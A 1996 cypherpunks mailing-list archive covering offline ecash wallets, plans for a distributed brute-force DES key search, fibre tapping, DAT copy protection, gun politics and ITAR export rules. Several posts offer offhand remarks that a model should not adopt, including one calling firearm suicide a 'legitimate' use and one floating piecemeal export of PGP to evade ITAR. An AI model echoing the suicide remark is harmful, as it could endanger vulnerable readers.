     ceiling(log2( 50/.01)) = 13 coins

So with only 13 coins, we are guaranteed to be able to make any single
payment from $.01 - $50 to the nearest cent.  Since we are dealing with base
2 logarithms, if we increase the maximum amount to $100, we only need a
single additional coin.

The algorithm to generate the coin values is simple.  Basically you start at
P and just keep dividing by two until you reach L.  For the above example,
we could use 13 coin values of: $25, $12.50, $6.25, $3.13, $1.57, $0.79,
$0.40, $0.20, $0.10, $0.05, $0.03, $0.02, and $0.01.  This actually gives us
a total of $50.05 due to rounding, but we are guaranteed of being able to
pay to the nearest cent any amount between $0.01 to $50.00, with multiple
possible combinations for certain values. 

Now, I'm not sure what the average size of an ecash coin is (anybody?), but
the few I've seen floating around the net in "ASCII armor" have been around
500-600 bytes (of ASCII text), I think.  So guessing (hopefully
conservatively) that the average coin size is about 1k or less, then we need
about 13k worth of storage space to make any single payment of $50 or under.

We can do a little better if we are willing to lose a little money in the
transaction. For instance, if L=$0.10, then we only need 9 coins (and we
will lose less than $0.10 in the transaction).  For L=$0.40, 7 coins.
Of course this probably isn't cost effective in most cases, but might
potentially be useful, if you are tight on storage space or something. 

So, with a storage space of approximately 64k (close to 5 x 13k), we are 
guaranteed of being able to make any 5 payments of $50 dollars of less, to 
the nearest cent.

Of course, we also need some software, but it should be fairly simple and
small.  Just a little database to keep track of which coins we have, and a
simple user interface to prompt for payment amount, select the appropriate
coins, and beam them off to the payee (probably also a transaction log, and
encryption capabilities).


A few points:

* This should be doable with current technology.  All we need is a fairly
small storage space, say 128K or less (more gives us more flexibility), and
something like IR, wireless, or even a serial port connection via cable to
send the coins to the payee.  This seems to allow things like Newtons, HP
Palmtops (and perhaps higher end calculators), USR Pilots, etc. to be used
as unconnected ecash "wallets".  This assumes the payee is online, since
they will want to clear the coins to make sure they are good. 

* This is less expensive than requiring both parties to be online.  The
payee doesn't need to provide a net connection to the payer; the payer
doesn't need to utilize memory space (and possibly additional hardware) 
for more complicated software to carry out the online transactions and
payment generation.  All the payee needs (besides the standard ecash
software and a net connection) is a method of receiving coins, like IR, and
some fairly simple software.

* Although one may be carrying around $250 with the above example, it is much
safer than carrying cash.  Ecash maintains the advantage of cash-like 
anonymity,  but we can keep a back-up of the money on our home machine, 
and we can encrypt the coins we carry to avoid having them spent by someone 
else, in case our portable device is lost or stolen. (Of course we do lose a 
possibly expensive portable device.)

* With the proper software and connections to the "ecash ATM" we can have
our portable device automatically recharged when we get home (and also
update the records of which coins were spent).  The ATM also gives us
complete control over our spending configurations.  There could even be
several default set-ups for frequently used cases, each assigned to a single
button.  Just connect your portable device, click a button, and you're ready
to go. For example, if you are going to work, you might generally want to
have the capability of several smaller payments for snacks, lunch, and
such.  For grocery shopping you may want a few larger payments, etc.  Also
the software could automatically keep track of your purchases (like a credit
card statement, or checking account log, but you'd be the only one who has
access to it).  Plus you don't need to run off to find an ATM; you can get
cash from "the comfort and privacy of your own home". 

* The main problem seems to be the loss of flexibility.  After you make your
maximum number of guaranteed payments you may have money left over, but it
may not be useful for buying what you want.  You may only have a $25 coin
left to purchase that $1.00 item.  Personally, as a possibly paranoid
technophilic cypherpunk, I don't see this as a major problem.  It means you
have to plan ahead a bit, but it gives you the same anonymity as cash, with
less chance of having you're money lost or stolen.  Those with PDD (Paranoia
Deficit Disorder (cypherpunks, are there drugs to treat this? :-)) may not
have the same view, and be more likely to use less private, more
"convenient" methods of payment.  But with the proper software setup and
user interface, this approach could probably be made acceptable to many.

* I'm not sure how easy this would be with the existing ecash software.
Browsing over the ecash API (http://www.digicash.com/api/Home.html), I see 
there is a EC_pocket_begin_withdrawal() function which looks like it may
automatically do something similar to the guaranteed payment thing I
described above (I've been salivating over the ecash API for a while, but 
haven't actually had to time to play with it yet).  Things may get tricky if
you pick funky values of L, the "loss limit".


In any case, it seems like this would be possible, even on an HP48.  Probably
not all that useful/usable though until you move up to something a little
more powerful (how much memory does the HP48 have? I have an old HP28S with
32k, so I'm guessing the '48 has more than that).

Once I finish up my thesis, find a job, and find some free time (hopefully
all within the next month and a half :-) I plan to play with this idea.
Unless someone else beats me to it, or there is something important I'm
missing.  Comments?

- --Matt

- --
mcarpent@mailhost.tcs.tulane.edu

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMfX32ijtJAMyBnp9AQGD+gf/TOe/ouunmhRz7jL+y65iqU57OaZAK1g0
gLIRDFQDTYMX7387FMBKlQ66RMJx4K80lW59oCAaa3/GyBDZR6Kn9bj2m7aZbYkL
4UDV7HoSJrV8qJv08HXnPibi7kmv+bAztHOAx7M7qo5qUayYCFrMeib65ksrrQYY
nnlnCPfLWAPMHeFYUSA3fv9XwQB9NZVSCgr8Z2vhnfCAERqLLukaXHJq9InSPmWw
XFIdU1x/cPzOUJx7rxth6qBonz5DD9AMof9Qqk8VY/AzohqHylKirog/IJRTefNl
p1xEdI/iBhH3m3azvNhtkEIl0MAzBGU26hBIjB2P9P+08shtMfznow==
=vR9P
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Wed, 24 Jul 1996 18:28:12 +0800
To: Mike Duvos <mpd@netcom.com>
Subject: Re: Brute-forcing DES
In-Reply-To: <199607230633.XAA19801@netcom20.netcom.com>
Message-ID: <Pine.LNX.3.94.960724054322.1558A-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 22 Jul 1996, Mike Duvos wrote:

> Date: Mon, 22 Jul 1996 23:33:58 -0700 (PDT)
> From: Mike Duvos <mpd@netcom.com>
> To: cypherpunks@toad.com
> Subject: Re: Brute-forcing DES
> 
> "Peter Trei" <trei@process.com> writes:
> 
>  > Sadly, after further calculation, I'm not so sure if it's
>  > doable just yet.
> 
> ....
> 
>  > The fastest general purpose, freely available des
>  > implementation I'm aware of is libdes. by Eric Young. With
>  > this, I can do a set_key in 15.8 us, and an ecb_encrypt in
>  > 95 us/block. That adds up to about 9,000 keytests/sec (this
>  > is on a 90 MHz P5, running NT).
> 
> What you really want to do to sweep the DES keyspace is to
> "schedule" the input and output block you are testing, performing
> any static operations, and do only enough computation to see that
> a given key fails.  Special purpose assembler to do this
> particular function would probably run faster than any algorithm
> which could also be employed to encrypt data.
> 
>  > What will make this brute doable, if not now, then in the
>  > near future?
> 
>  > 1. Faster Processors
> 
>  > 2. More processors.
> 
>  > 3. More interest
> 
> 4. Better code.
> 

We also need to address the question of the code itself.  Just crypting it
won't work.  We need a good way to test _to see if we have an answer_, for
a non-known plaintext attack.

 --Deviant
Whatever occurs from love is always beyond good and evil.
		-- Friedrich Nietzsche


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMfW4+DAJap8fyDMVAQECmAf+Le7kpXqvGDOSMhRdUG6qluP/RkBE9oeR
1O0pmeHPHtMU1qAgL1c9YJ3fHAdb+naLIhff1x8K2Nt4LsVYiNHY1va3ogg3P6mx
G/1N+4iOtsL49XXhO+YnJfHxd8fYAdQKftWwcQc9DOpUbvHoD/yWIS94YHHnH6Zn
Uly5cQqKtpNh20uq5gCC6GcJWj+Dm6BjaKrYuUgSwBNrnYBSQ6nui7W26zawA4vh
GHtxKWIJQ9onBYWM025YuYhzTpRy852aLZifw1xPtAXXe1TypjcRojXcTtBL0iK0
oWVbtRWwxqKlzhmOiktec75jWjduREBoMve4OCE/3G0obILS84qxhA==
=f9OL
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjn@nworks.com
Date: Wed, 24 Jul 1996 21:31:31 +0800
To: cypherpunks@toad.com
Subject: RE: Distributed DES crack
Message-ID: <TCPSMTP.16.7.24.6.11.46.2645935021.655448@.nworks.com>
MIME-Version: 1.0
Content-Type: text/plain


 > I've a few machines around that could be dedicated almost full time to the
 > task. What are the bandwidth requirements? Specifically, could the
 > keycracker be run over a 28.8 (with a 486 running linux)?  If so, how many
 > 486's could I get over a single 28.8 (i.e. 28.8 -> multiple 486's daisy
 > chained with ppp over direct serial connection)?

 > It's not a factor of the bandwidth, you search offline and send in
 > your results to a central server.

 > But first, a little reality check is in order.  According to libdes,
 > the 200Mhz Pentium Pro on my desk will do 1,827,997 ECB bytes/sec, or
 > 228,499 ECB blocks.  A DES crack would have to try, on average, 2^55
 > blocks.  That would take my machine 43,798,875 hours, or 1,824,953
 > days. 
 > OK, so let's be reasonable and say that a week would be a good time to
 > come up with a DES key.  We would need 260,707 200Mhz Pentium Pro's to
 > achieve this.

 > Looking at that, 30 days seems not such an unreasonable target.  We
 > would need 60,831 200Mhz Pentium Pro's to achieve this.

 > It seems obvious to me that DES is still *way* out of reach of
 > anything other than special purpose hardware.


 In> - Andy (hoping he got his sums right)
            (I think you did :)

 One small thing...

 You are assuming that we will not get the right equasion/code/whatever
 untill the very end.  There is a good chance that it will only take
 half that time...and a slim chance that we will get it with the first
 try...


 P.J.
 pjn@nworks.com

 (BTW, I have a 486 DX/4 100MhZ That I will put to the effort...)





... As easy as 3.14159265358979323846264338327950288419716

___ Blue Wave/QWK v2.20 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Wed, 24 Jul 1996 17:54:19 +0800
To: Kevin L Prigge <Kevin.L.Prigge-2@tc.umn.edu>
Subject: Re: Brute Force DES
In-Reply-To: <31f4f77f1947002@noc.tc.umn.edu>
Message-ID: <Pine.LNX.3.94.960724063243.1558B-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 23 Jul 1996, Kevin L Prigge wrote:

> Date: Tue, 23 Jul 1996 11:02:06 -0500 (CDT)
> From: Kevin L Prigge <Kevin.L.Prigge-2@tc.umn.edu>
> To: perry@piermont.com
> Cc: trei@process.com, cypherpunks@toad.com
> Subject: Re: Brute Force DES
> 
> Perry E. Metzger said:
> > 
> > "Peter Trei" writes:
> > > The fastest general purpose, freely available des implementation I'm
> > > aware of is libdes. by Eric Young. With this, I can do a set_key in 
> > > 15.8 us, and an ecb_encrypt in 95 us/block. That adds up to 
> > > about 9,000 keytests/sec (this is on a 90 MHz P5, running NT).
> > 
> > I'll point out that like most DES implementations, Eric's tries to
> > spend a lot of time in key setup to save time later on in
> > encryption/decryption. This tradeoff would probably be very different
> > if you didn't plan on trying more than one or two blocks of decryption
> > after getting a key.
> > 
> 
> For instance if you had a DES encrypted gzipped file. The first 2 bytes
> plaintext will be Ox1f8b. You'd only have to try to fully decrypt 
> 1 out of 65535 keys.
> 

Buy the point is to prove that DES shouldn't be used, not that it CAN
be brute forced.  A known-plaintext attack doesn't show that.  We hafta
attack something we've never seen. (i.e. talk Netscape, or some other
company, into generating a DES'd message, and keeping the keys safe)

 --Deviant
Whatever occurs from love is always beyond good and evil.
		-- Friedrich Nietzsche


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMfXEpjAJap8fyDMVAQGKQQf/VSnWcM4CwKnAuOjASUIkXLPw6CIjhjh5
pg1MQ9+H8phzJexzMj5PyQgC5onSdjXn8CVfSHGK/iFXmUW1ZddkkSJT7g5IAto8
IiN9UY6XitFQMfP6MLgKc8ynd91qE57+NGrknrMopFiBwbh5B7j1zJ6gVWQvrlox
BkyJhveuC821Y1ziWXUBtxc+UWhZUHaUtOyUhliXKAGpHv7nOVbYhPeH3r7UzAoR
LGs/7uP/9hLGexbpS3WAFcV7yWQAkyaPg3xoGhLGrTO6XLF3dOgp9CW75lZBtuGQ
rG3Wj+G/BPIUuls2DvGCsv++SObemtj+Xvw+DLwYF806WMajWQEbpw==
=b2PJ
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathon Blake <grafolog@netcom.com>
Date: Wed, 24 Jul 1996 17:16:33 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: RE: [Noise] was Re: Giving 6 year old kids Uzi's
In-Reply-To: <ae1afdb008021004ba66@[205.199.118.202]>
Message-ID: <Pine.SUN.3.95.960724063434.5254K-100000@netcom16>
MIME-Version: 1.0
Content-Type: text/plain


	Tim:


On Wed, 24 Jul 1996, Timothy C. May wrote:

> I'm _still_ missing the reference here? Just who *seriously* is proposing
> that 6-year-old children carry guns to school?

	It was a misquote of mine.

	I said "I'd feel safer in a society where 6 year olds
	carried Uzi's."

        xan

        jonathon
        grafolog@netcom.com

	






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 24 Jul 1996 22:15:27 +0800
To: cypherpunks@toad.com
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
Message-ID: <2.2.32.19960724111141.008bb63c@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:38 PM 7/23/96 -0400, hallam@Etna.ai.mit.edu wrote:

>The facts are very clear, if you have a handgun in the house it is
>far more likely to kill a member of the familly than stop an
>intruder. The NRA know this which is why they have lobbied for the
>CDC to stop research in this area - they do not like the facts.

And most people who die after jumping out of airplanes have (defective)
parachutes.  Therefore it is safer to jump out of airplanes without parachutes.

The CDC sucked suicides into the mix to cook the books and suicide by
firearms is a *legitimate* use of same.  Surely you believe in the "right to
die," don't you?

DCF 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Wed, 24 Jul 1996 18:56:25 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Borders *are* transparent
In-Reply-To: <Pine.SUN.3.91.960723132622.28907A-100000@tipper.oit.unc.edu>
Message-ID: <Pine.LNX.3.94.960724072354.1558C-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 23 Jul 1996, Simon Spero wrote:

> Date: Tue, 23 Jul 1996 13:38:59 -0400 (EDT)
> From: Simon Spero <ses@tipper.oit.unc.edu>
> To: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
> Cc: Cypherpunks <cypherpunks@toad.com>
> Subject: Re: Borders *are* transparent 
> 
> On Tue, 23 Jul 1996, Peter D. Junger wrote:
> > 
> > I am afraid that the number of machines needed would trivialize even
> > the most non-trivial cash prize.  But for what its worth, I can give
> > you a lot of spare cycles on a couple of 486 Linux boxes.
> 
> Not really - you just give the prize to the first person to return the 
> correct key (just like a real lottery).
> 

But who's money?

> 
> BTW, if you use a central site to allocate ranges to search, this site 
> should not know the correct key, as otherwise it could decide who gets 
> the chocolate bar with the golden ticket.
> 

Definatly.

> 
> If this project is run, I can't see it getting a hit for at least six 
> months unless its _really_ well promoted. The java approach would be a cool 
> hook - a slowish applet for your web page with something along the lines of
> 
>  "You may already have won 20c; whilst you're reading this page, your
> computer is playing the cypherpunks challenge. For a better chance of
> winning, download this free high performance screen saver and game piece."
> 

Or better yet... use an applet and a cookie... you pass it a cookie, the
applet figures the processor type and runs a certain number of cracks,
(within a specified range, listed in the cookie) changes the cookie, and
returns it (that may or may not have been sarcasm ;)

 --Deviant
Whatever occurs from love is always beyond good and evil.
		-- Friedrich Nietzsche


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMfXQWDAJap8fyDMVAQHudwf9HRjkXkToQcUb4dnmfLYl4LO3PFa0RCrF
ADOZmOpdOGlHhSFmzXRM/mdd/hnPnbltVpAULC8Pkb+ztGOyAUbSyYyZaBszNKNE
dF0ri0e+NXs6UNDFQonGriM3Qi+3Pvb4fVXYvJ5Of1NIvDlO+rSOzrymo6j1wb6A
1HA7/jj3xtpy0vV/175QNgnqmIcGFEn89biR/nVQpGuFBEXw+JGajjibohAbcvbv
xeaxuKvNg3rMk0ynqUDL2/5sYGUf9q4VzLzmjt9c12OIt83lUWH4YAj7gDCrpCyx
Lxsxln3Y9b6DoeBmtMY1RT9rUiNHziBOD7r1ePeGcrdAAVjFuR5QNg==
=lltr
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 24 Jul 1996 22:48:19 +0800
To: david@sternlight.com
Subject: Re: Another fascist
Message-ID: <01I7FYYCX5VK9EDE4M@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"david@sternlight.com"  "David Sternlight" 23-JUL-1996 08:30:51.02

>One of the great friends of free speech on this list sent a forged cancel
>message to the listbot to try to cancel my subscription.

>The listbot, being reasonably well designed, ignored him and told me about
>it, though I have no doubt less of a dunce could bring it off.

>What a piece of slime! What do others think of this practice?

	You have my sympathies. Either I got logged off the list accidentally
a bit back, or someone did this successfully to me. I didn't notice due to
being gone for a bit, but I finally did and got back onto the list. I'd meant
to email the list maintainer (Eric Hughes, as I recall), but haven't gotten
around to it - lack of time. Any signs of who did it from the message? I would
guess not.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 24 Jul 1996 23:25:46 +0800
To: mab@crypto.com
Subject: Re: Distributed DES crack
Message-ID: <01I7FZ3IBTAU9EDE4M@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"mab@crypto.com"  "Matt Blaze" 23-JUL-1996 09:38:21.11

>Personally, I'd rather someone finish up the Wiener ASIC to the point where
>it could go out to fab, get some prototype chips made, design a board around
>it, and publish the design, from board layout on down.  This would be a
>great Master's project, and some of us (maybe me, but I'll have to check)
>might even be able to scrape up enough funds to buy enough chips/boards/etc
>to build a modest size machine (say, that could exhaust a DES key in 1-6
>months).  Initial engineering costs aside, the marginal cost of each
>such machine could be well within the budgets of, say, a medium size crypto
>research lab, and would make a scary enough demo to convince even the
>most trusting management types of the risks of 56 bit keys.

	How about generalized FPGA boards? Some applications in computational
biology (searching for similar genes or proteins using FASTA, etcetera) use
those quite a bit - and they're available for only about 20,000 or so for quite
a few high-level FPGA chips on a board. We've been looking into getting one
such and renting its use out on the Web, but the initial investment costs are
beyond what available grants will cover; maybe later. Given that at Rutgers is
one of the people doing whole bunches of stuff on Web security - namely Simon
Cooper - it should't be too difficult. But that will be at least a year or so.
	-Allen

> - matt
>(Please cc me on replies, as I'm not reading the list except when someone
>alerts me to an interesting topic.  Thanks.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Wed, 24 Jul 1996 18:59:33 +0800
To: pjn@nworks.com
Subject: Re: Brute-forcing DES
In-Reply-To: <TCPSMTP.16.7.23.-16.25.44.2645935021.655233@.nworks.com>
Message-ID: <Pine.LNX.3.94.960724075327.1558D-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 23 Jul 1996 pjn@nworks.com wrote:

> Date: Tue, 23 Jul 1996 16:25:44 -0500 
> From: pjn@nworks.com
> To: cypherpunks@toad.com
> Subject: Brute-forcing DES
> 
>  > Any one up for a distributed brute force attack on single DES? My 
>  > back-of-the-envelope calculations and guesstimates put this on the
>  > hairy edge of doability (the critical factor is how many machines can
>  > be recruited - a non-trivial cash prize would help). 
> 
>  >> Count me in. I've got a couple of net-connected Pentiums that are
>  >> mostly idle. 
> 
>     Although I dont have a pentium, I would be glad to put forth
>     some computer power to help.
> 
>  >> Might be able to bring some money in by selling "I Helped Crack DES
>  >> And  All I Got Was This Lousy T-shirt" T-shirts.
> 
>     Id buy one! :)
> 

Actually... we might as well print up the t-shirts, and sell them for $15
apeice, then buy a DES cracker with the profit ;)

Seriously though, I'd by the t-shirt, and I'll donate processor time.  I
can definatly give an 8086 (BALK) to the process, some time on a 80386,
and a limited amount of time on some p75's...

 --Deviant
Whatever occurs from love is always beyond good and evil. 
		-- Friedrich Nietzsche


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMfXXDzAJap8fyDMVAQHoFgf9EpXRvhXBLjQViyA2PQt7xGWpXqRlIYfz
MCkTWabmUYAOdGcRNBGhbwSejH6xTAdr7t+KRRb2ZgVsSsJlCnnhX14CR8w17q7D
k/eO2FoIl7dv3V5Kj7iQqSbRrhccqVa10jHWAbK6O8j+yCjfejWk2Le/r7Bdg+t/
5b3WjISljPbhTKf2K4gojXmXyIQYnlirV6EKuQGQJRbWL9zkAqMYdH4I0S9C6SNP
GFukn1tp65g/H8Ww93TZovmffKGwsZwYbPCxoMQlRJF5taeb0AUAKwbEyoNgBWY1
FTsgCEzs8cO19wtlqmGdFfGg/7OHQ/eloIvGGDpcQL3u4elWCu+oiA==
=W/GZ
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Wed, 24 Jul 1996 23:11:15 +0800
To: deviant@pooh-corner.com (The Deviant)
Subject: Re: Brute Force DES
In-Reply-To: <Pine.LNX.3.94.960724063243.1558B-100000@switch.sp.org>
Message-ID: <199607241301.IAA00906@homeport.org>
MIME-Version: 1.0
Content-Type: text


	Most protocols give you stereotyped headers, which are
perfectly valid for known plaintext attacks.  The rc4 cracks were done
on the Netscape rc4(md5(key+salt) used in ssl.  They were based on
known plaintext in the HTTP headers.

	(Incidentally, we might want to test the key distribution &
reporting mechanisms on a crack of vanilla rc4-40, or another SSL
crack.  Cracking des will not be cheap, and we should do some test
runs first.)

Adam

The Deviant wrote:

| > For instance if you had a DES encrypted gzipped file. The first 2 bytes
| > plaintext will be Ox1f8b. You'd only have to try to fully decrypt

| Buy the point is to prove that DES shouldn't be used, not that it CAN
| be brute forced.  A known-plaintext attack doesn't show that.  We hafta
| attack something we've never seen. (i.e. talk Netscape, or some other
| company, into generating a DES'd message, and keeping the keys safe)


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 24 Jul 1996 14:38:45 +0800
To: cypherpunks@toad.com
Subject: Re: Bare fibers
Message-ID: <ae1ac24201021004c36e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:56 PM 7/23/96, Bill Frantz wrote:
>At 12:30 AM 7/23/96 -0500, Douglas R. Floyd wrote:

>>Not really sure how.  I have had heard of ways to tap a fibre optic link
>>noninvasively, but its not related to Van Eck or anything like that.
>
>You could break the fiber and add a repeater (if you know enough about the
>light protocol).  Plastic fiber can be cut with a pocket knife, glass
>requires a machine which will make a square cut and polish the end.  Those
>machines are not yet cheap.

Fibers can be tapped noninvasively, and without cutting them, by placing
detectors in direct proximity to the fiber. That is, touching the glass or
plastic.

For fibers relying on total internal reflection at the fiber boundary, the
waves actually partly exist beyond the boundary (with an imaginary
component). Another fiber or a detector placed near this boundary can make
this imaginary component become "real," and hence detect the wave. This is
"tunneling," of course.

(A simple demonstration is done with a glass prism reflector, a reflector
relying on total internal reflection. If a symmetrical prism is placed up
against the first prism, the "total reflector" ceases to be.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 24 Jul 1996 19:43:27 +0800
To: cypherpunks@toad.com
Subject: Re: Flaws of Thinkers (Jefferson, Rand, Nietzsche, Voltaire, etc.)
Message-ID: <ae1ac7c2020210040e54@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:40 AM 7/23/96, bryce@digicash.com wrote:

>I know a lot about Rand, and about her deep flaws as an
>individual, especially in terms of treatment of her supporters,
>but this is the first I've heard of this one.  Perhaps Tim is
>thinking of a play by Murray Rothbard called "Mozart Was a Red"
>in which the Ayn Rand caricature insists that her followers
>smoke.
>
>As for smoking being "proof" of man's dominance over nature,
>Rand _did_ believe that in the sense of "demonstration" or
>"symbol" but she did not believe that in the rigorous sense of
>"proof".

This was well-known to a bunch of us in the early 70s who were interested
in Rand (and her extreme followers, known widely as "Randroids"). I think
some of her essays in her Objectivist Newsletter had explained why smoking
was essentially de rigeur. (By the way, at the time Rand was writing this
stuff, doctors were recommending smoking as a digestive and health aid, and
nearly everyone smoked. I don't condemn Rand for smoking, or for falling
into the all-too-common practice of using "logic" to justify one's beliefs
and practices.)

Rothbard was a source for the smoking example, but not in a play (although
he may have also used his knowledge in a play...I wouldn't know). Rothbard
wrote an article for "Liberty," circa 1986-8, which is where I read the
details. Also, I believe Barbara Branden's biography of Rand dealth with
this, but I haven't read it in many a year.

And there is this comment, from an admittedly off-beat source
(http://www.zonpower.com/zonpower/book/chapters/chapter29.html):

"Whatever the root of his irrationality, Dr. Peikoff's persona shrinks with
his advocating force-backed intolerance as he expressed during his 1995
Ford Hall Forum lecture. Recall how Ayn Rand's life wastragically
diminished by her irrational, deadly, "dot-of-light" glamorization of
smoking. Her emotional,
irrational denials of the narcotically addictive, physically destructive
nature of tobacco smoking led her and some of her "caped" followers to the
grave."

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Wed, 24 Jul 1996 23:13:02 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Digital Watermarks (long, getting off-topic)
In-Reply-To: <ae1af49306021004964e@[205.199.118.202]>
Message-ID: <31F613B0.446B9B3D@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
 
> Pre-recorded DAT tapes were available for a while...they did not sell. I
> believe this was because DAT machine purchasers were sophisticated and new
> how to make CD-to-DAT copies, with or without SCMS.

Don't forget that pre-recorded DAT tapes are at least an order of
magnitude more expensive to manufacture than CDs. 

Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 24 Jul 1996 20:12:29 +0800
To: cypherpunks@toad.com
Subject: Re: Digital Watermarks (long, getting off-topic)
Message-ID: <ae1af49306021004964e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


(My comments are really minor quibbles, based on my longtime use of DAT
machines, which I now have three of.)

At 2:19 PM 7/23/96, Alex F wrote:

>The Ent. Ind. got what they wanted though.  There are taxes, etc.
>(some sort of import restrictions anyway) that keep DAT player/recorder
>devices at around $700 per unit.  By this time normally the prices
>*should* be down to like $200 (using the CD industry as a guide)

As I said, I have three DAT machines. They are complicated machines, having
lots of moving parts and precise tolerances. (And they are prone to break!)
CD players are vastly simpler.

I'm not at all surprised that prices have remained at about the $400 level
for DAT decks, and about the same for DAT portables. After all, camcorders,
which use much the same technology, have also remained at about the same
price.

And I don't think the SCMS code had too much to do with mass-acceptance.
Most comsumers, according to available figures, *buy* C-90 cassette tapes,
and do not make their own. (That _you_, the CP list reader, may use your
cassette deck to make tapes has little to do with the vast numbers of
cassette users out there do...most don't know how to record with their
cassette decks.)

Pre-recorded DAT tapes were available for a while...they did not sell. I
believe this was because DAT machine purchasers were sophisticated and new
how to make CD-to-DAT copies, with or without SCMS.

Thus, the failure of DAT as a consumer medium (not to mention the
much-hyped MD and DCC formats) probably is due to other reasons, including
the mechanical issues, the lack of a real need for consumer DAT, and the
confusion over new emerging formats.

--Tim May



Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 24 Jul 1996 19:29:30 +0800
To: cypherpunks@toad.com
Subject: Re: Question
Message-ID: <ae1af7ae0702100450ea@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:25 PM 7/23/96, pjn@nworks.com wrote:
>OK...A question for you all:
>
>  If it is illegal (by our governments standards...) to export programs
>like PGP, etc., and you can send the whole source code in a message
>because that is also considered illegal, then could you send the code,
>broken up into many pieces, and send THAT in Email, would that be
>illegal?

I don't think this has been spelled-out clearly in the ITARs, much less
tested in court, but the intent is clearly to subvert the ITARS.

Isomorphic to shipping out a piece of military hardware in pieces, wouldn't
you say?

And don't forget the "structuring" laws regarding the reporting of cash
transactions over $10K.

I don't think this has much promise.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
